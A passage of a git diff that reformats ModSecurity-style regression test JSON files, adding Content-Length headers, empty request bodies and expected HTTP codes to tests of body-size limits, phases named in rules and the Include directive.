"ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2" - }, - "uri":"/?key=value&key=other_value", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyLimitAction ProcessPartial", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Content-Length": "493" + }, + "uri": "/?key=value&key=other_value", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -291,146 +308,158 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyLimitAction ProcessPartial", "SecRequestBodyLimit 5" ] }, - { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyLimitAction Reject - Engine Disabled", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ + { + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyLimitAction Reject - Engine Disabled", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" + }, + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine Off", "SecResponseBodyLimitAction Reject", "SecResponseBodyLimit 5" ] }, - { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyLimitAction Reject - Engine Detection Only", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ + { + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyLimitAction Reject - Engine Detection Only", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" + }, + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecResponseBodyLimitAction Reject", "SecResponseBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - urlencoded, limit exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "41", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - urlencoded, limit exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Request body excluding files is bigger than the maximum expected.", - "http_code":400 + "expected": { + "debug_log": "Request body excluding files is bigger than the maximum expected.", + "http_code": 400 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 20", @@ -438,45 +467,46 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - urlencoded, limit not exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "41", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - urlencoded, limit not exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 60", @@ -484,46 +514,47 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - json, limit exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "41", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - json, limit exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "48", "Content-Type": "application/json" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "{\"param1\":{\"param2\":\"value2\",\"param3\":\"value3\"}}" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Request body excluding files is bigger than the maximum expected.", - "http_code":400 + "expected": { + "debug_log": "Request body excluding files is bigger than the maximum expected.", + "http_code": 400 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 20", @@ -532,45 +563,46 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - json, limit not exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "41", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - json, limit not exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "48", "Content-Type": "application/json" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "{\"param1\":{\"param2\":\"value2\",\"param3\":\"value3\"}}" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 80", @@ -579,47 +611,48 @@ ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"SecRequestBodyNoFilesLimit - xml, limit exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "77", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - xml, limit exceeded", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "77", "Content-Type": "application/xml" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "ccceee" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Request body excluding files is bigger than the maximum expected.", - "http_code":400 + "expected": { + "debug_log": "Request body excluding files is bigger than the maximum expected.", + "http_code": 400 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 20", @@ -628,46 +661,47 @@ ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"SecRequestBodyNoFilesLimit - xml, limit not exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "77", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - xml, limit not exceeded", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "77", "Content-Type": "application/xml" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "ccceee" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 90", @@ -676,54 +710,55 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - multipart, limit exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "77", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - multipart, limit exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "198", "Content-Type": "multipart/form-data; boundary=0000" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ - "--0000", - "Content-Disposition: form-data; name=\"a\"", - "", - "1", - "--0000", - "Content-Disposition: form-data; name=\"b\"; filename=\"c.txt\"", - "", - "2222222222222222222222222222222222222222222222222222222222222222222222", - "--0000--" + "--0000\n", + "Content-Disposition: form-data; name=\"a\"\n", + "\n", + "1\n", + "--0000\n", + "Content-Disposition: form-data; name=\"b\"; filename=\"c.txt\"\n", + "\n", + "2222222222222222222222222222222222222222222222222222222222222222222222\n", + "--0000--\n" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Request body excluding files is bigger than the maximum expected.", - "http_code":400 + "expected": { + "debug_log": "Request body excluding files is bigger than the maximum expected.", + "http_code": 400 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 80", @@ -731,53 +766,54 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - multipart, limit not exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "77", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - multipart, limit not exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "198", "Content-Type": "multipart/form-data; boundary=0000" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ - "--0000", - "Content-Disposition: form-data; name=\"a\"", - "", - "1", - "--0000", - "Content-Disposition: form-data; name=\"b\"; filename=\"c.txt\"", - "", - "2222222222222222222222222222222222222222222222222222222222222222222222", - "--0000--" + "--0000\n", + "Content-Disposition: form-data; name=\"a\"\n", + "\n", + "1\n", + "--0000\n", + "Content-Disposition: form-data; name=\"b\"; filename=\"c.txt\"\n", + "\n", + "2222222222222222222222222222222222222222222222222222222222222222222222\n", + "--0000--\n" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 120", @@ -785,4 +821,3 @@ ] } ] - diff --git a/test/test-cases/regression/config-calling_phases_by_name.json b/test/test-cases/regression/config-calling_phases_by_name.json index 39bd6f46d2..14b050477b 100644 --- a/test/test-cases/regression/config-calling_phases_by_name.json +++ b/test/test-cases/regression/config-calling_phases_by_name.json @@ -1,79 +1,91 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Config :: Phases by name (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Config :: Phases by name (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Target value: \"other_value\" \\(Variable: MATCHED_VAR\\)" + "expected": { + "debug_log": "Target value: \"other_value\" \\(Variable: MATCHED_VAR\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:key \"@contains other_value\" \"id:1,phase:request,pass,chain\"", "SecRule MATCHED_VAR \"@contains asdf\" \"\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Config :: Phases by name (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Config :: Phases by name (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Target value: \"other_value\" \\(Variable: MATCHED_VAR\\)" + "expected": { + "debug_log": "Target value: \"other_value\" \\(Variable: MATCHED_VAR\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:key \"@contains other_value\" \"chain,pass,phase:response,id:28\"", "SecRule MATCHED_VAR \"@contains Aasdf\" \"\"", @@ -83,4 +95,3 @@ ] } ] - diff --git a/test/test-cases/regression/config-include-bad.json b/test/test-cases/regression/config-include-bad.json index 76797552d7..6d64a14cd1 100644 --- a/test/test-cases/regression/config-include-bad.json +++ b/test/test-cases/regression/config-include-bad.json @@ -1,51 +1,159 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Include - bad rule", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Include - bad rule", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "Rules error. File: test-cases/data/config_example3.txt. Line: 2. Column: 66. Expecting an action, got: ops \"id:1000,pass,t:trim\"" }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example3.txt", "SecRule ARGS \"@missing_operator test\" \"id:19,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include - missing file", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Include - missing file", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "Rules error. File: config-include-bad.json. Line: 2. Column: 46. test-cases/data/config_example-ops.txt: Not able to open file." }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example-ops.txt", "SecRule ARGS \"@contains test\" \"id:19,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include - missing at include", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Include - missing at include", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "Rules error. File: test-cases/data/config_example-ops-include.txt. Line: 1. Column: 52. test-cases/data/config_example-not-exist.txt: Not able to open file." }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example-ops-include.txt", "SecRule ARGS \"@contains test\" \"id:19,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include - duplicate id", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Include - duplicate id", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "Rule id: 40 is duplicated" }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example.txt", "Include test-cases/data/config_example.txt", diff --git a/test/test-cases/regression/config-include.json b/test/test-cases/regression/config-include.json index ab73de0760..1dd1c2b90a 100644 --- a/test/test-cases/regression/config-include.json +++ b/test/test-cases/regression/config-include.json @@ -1,199 +1,229 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Include (1/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (1/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example2\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example2\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example2.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (2/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (2/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (3/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (3/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example2\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example2\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example2.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (4/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (4/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": 